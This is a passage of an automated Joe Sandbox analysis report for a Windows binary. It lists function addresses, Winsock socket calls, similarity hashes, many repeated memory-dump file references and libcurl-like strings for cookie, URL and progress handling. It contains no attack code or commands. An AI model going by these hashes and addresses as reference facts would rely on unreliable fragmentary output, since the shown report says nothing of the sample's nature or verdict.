                                                        • API String ID: 2809346765-0
                                                        • Opcode ID: 259cb4a37b22c08e253f0202dd0a4ee49fceec04afb8f6f9fe172e21a046b1a2
                                                        • Instruction ID: ef95a8ae87689a2e46c8e47526655e47ac6a286b1fe6c878e6fd5f1a5da81079
                                                        • Opcode Fuzzy Hash: 259cb4a37b22c08e253f0202dd0a4ee49fceec04afb8f6f9fe172e21a046b1a2
                                                        • Instruction Fuzzy Hash: 0B01A272B01710AFD6158F25DC45B9ABBA5FFC4720F068659EA982B361C331AC508BD1
                                                        Function 0051AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WS2_32(?,0051B280,00000000,-00000001,00000000,0051B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0051AF67
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: socket
                                                        • String ID:
                                                        • API String ID: 98920635-0
                                                        • Opcode ID: 5dd7d17cf3c532a84a85cfe1f20b9d02aeb9bb8cd04bf64b84f4f0e2ba75d728
                                                        • Instruction ID: f2986e923ed1290bba7bee5032dd2bb96d4ba46f6cd99205c8df5971d1a9f009
                                                        • Opcode Fuzzy Hash: 5dd7d17cf3c532a84a85cfe1f20b9d02aeb9bb8cd04bf64b84f4f0e2ba75d728
                                                        • Instruction Fuzzy Hash: 07E0EDB6A092216BD655DA18E8449ABF76DEFC4B20F055A49B85467204C730AC918BE2
                                                        Function 0051B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • closesocket.WS2_32(?,00519422,?,?,?,?,?,?,?,?,?,?,?,w3P,008E4C60,00000000), ref: 0051B04D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: closesocket
                                                        • String ID:
                                                        • API String ID: 2781271927-0
                                                        • Opcode ID: a4ee483dd31d7f9a419fcc19560c8e8750fe3827ce838f431944aa7fb39b36c4
                                                        • Instruction ID: a4b81738d9c29b0582ac7d327f58e8e036fde2a7f552c3d8539424b707af3178
                                                        • Opcode Fuzzy Hash: a4ee483dd31d7f9a419fcc19560c8e8750fe3827ce838f431944aa7fb39b36c4
                                                        • Instruction Fuzzy Hash: 37D0C23430060157EA248A14C888A977A2B7FC5310FA8CB6CE02C8A150C73BCC83C602
                                                        Function 004B67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ioctlsocket.WS2_32(?,8004667E,?,?,0048AF56,?,00000001), ref: 004B67FC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: ioctlsocket
                                                        • String ID:
                                                        • API String ID: 3577187118-0
                                                        • Opcode ID: 9fceb9614898cef8b644fad8a3e77ff3230c591df07d05877bc326965e7c7115
                                                        • Instruction ID: fd7d81672d212ed3b44b79f2b11354356f5c918ce99ed8121b6d4dadcf1e78ad
                                                        • Opcode Fuzzy Hash: 9fceb9614898cef8b644fad8a3e77ff3230c591df07d05877bc326965e7c7115
                                                        • Instruction Fuzzy Hash: 15C012F1118601AFC6088714D865A6F76E8DB85355F01581CB04681180EA709990CA16
                                                        Function 004531D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: dc37851faf260d54694b99827936dcb3a5044a18448c1f56c0ed0c1fb3aa917c
                                                        • Instruction ID: 6fe749181326a5579ab4da0c430b3899c9bc12bd6f5dd2f459da7573bbd99b79
                                                        • Opcode Fuzzy Hash: dc37851faf260d54694b99827936dcb3a5044a18448c1f56c0ed0c1fb3aa917c
                                                        • Instruction Fuzzy Hash: AE3182B49097149BCB10EFB8C58969EBBF0BF44345F00896EE899E7341EB749A44CF52

                                                        Non-executed Functions

                                                        Function 00491BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                        • API String ID: 0-1371176463
                                                        • Opcode ID: 0a29250f0c1eb031dc2abdab321977718106fee2c55f55ecdb2e499a038cb698
                                                        • Instruction ID: 64b0e2fed83f8bf0154eb3a40ea6ddc20b9c9b53e849034337aad81d9463a390
                                                        • Opcode Fuzzy Hash: 0a29250f0c1eb031dc2abdab321977718106fee2c55f55ecdb2e499a038cb698
                                                        • Instruction Fuzzy Hash: 07B22870A48301BBDF20AA259D46B277FD46F94308F08453FE88996392F7B9EC05975A
                                                        Function 007DE050 Relevance: 21.3, APIs: 8, Strings: 3, Instructions: 2082COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $d$nil)
                                                        • API String ID: 0-394766432
                                                        • Opcode ID: 0feb4bcc8c76ee5901b62360dbf00fbbb3c8d1805a6b68c01bc6e8e8a9810f31
                                                        • Instruction ID: a6bee9a60a34346927b7376cc601b13746828352228974f8c40ebb6b7f7fa99b
                                                        • Opcode Fuzzy Hash: 0feb4bcc8c76ee5901b62360dbf00fbbb3c8d1805a6b68c01bc6e8e8a9810f31
                                                        • Instruction Fuzzy Hash: 4B137B70608341CFD721DF29C08462ABBF1BF89754F28492EE9959B3A1D779EC45CB82
                                                        Function 00464940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                        • API String ID: 0-122532811
                                                        • Opcode ID: 98629b92c5eee32a54e2ca32b34264ab7de21cf30082af13dc63381b25e7f3b9
                                                        • Instruction ID: 6cd7f49dffd49be2621632842f2d22fbccfd3496fd86d67e62c3b357e00bbe9f
                                                        • Opcode Fuzzy Hash: 98629b92c5eee32a54e2ca32b34264ab7de21cf30082af13dc63381b25e7f3b9
                                                        • Instruction Fuzzy Hash: 4B42E8B1B08700AFD708DE24CC81B6BB6E6FBC4704F04892EF55997391E779A9148B97
                                                        Function 00463ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                        • API String ID: 0-3977460686
                                                        • Opcode ID: 93087cad59c5b01437ee78033a20ce664b285fb4d127dc79fe0de45318e2300f
                                                        • Instruction ID: 8d337d0e89a4adfb9977ca8ae748972989da10ae1f836ba9235ea7e59f216dc1
                                                        • Opcode Fuzzy Hash: 93087cad59c5b01437ee78033a20ce664b285fb4d127dc79fe0de45318e2300f
                                                        • Instruction Fuzzy Hash: 843217B1A083014BCB24AF289C4136B77D6ABD1324F15472FE9A59B3D2F67CD941878B
                                                        Function 00474F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                        • API String ID: 0-1914377741
                                                        • Opcode ID: 8fc1314cf3356611ed25d6b52540e87f5b2dcd24863b834369126c95213fe3af
                                                        • Instruction ID: 80875a9559f6b6d1e292b075360e89b998fa913aae41e17f59c2879b2ef6b7a3
                                                        • Opcode Fuzzy Hash: 8fc1314cf3356611ed25d6b52540e87f5b2dcd24863b834369126c95213fe3af
                                                        • Instruction Fuzzy Hash: AB720670A08B419BE7214A28C5457E777D29F91344F05C62EED8C5F393E7FAD884878A
                                                        Function 00509880 Relevance: 10.2, Strings: 8, Instructions: 226COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
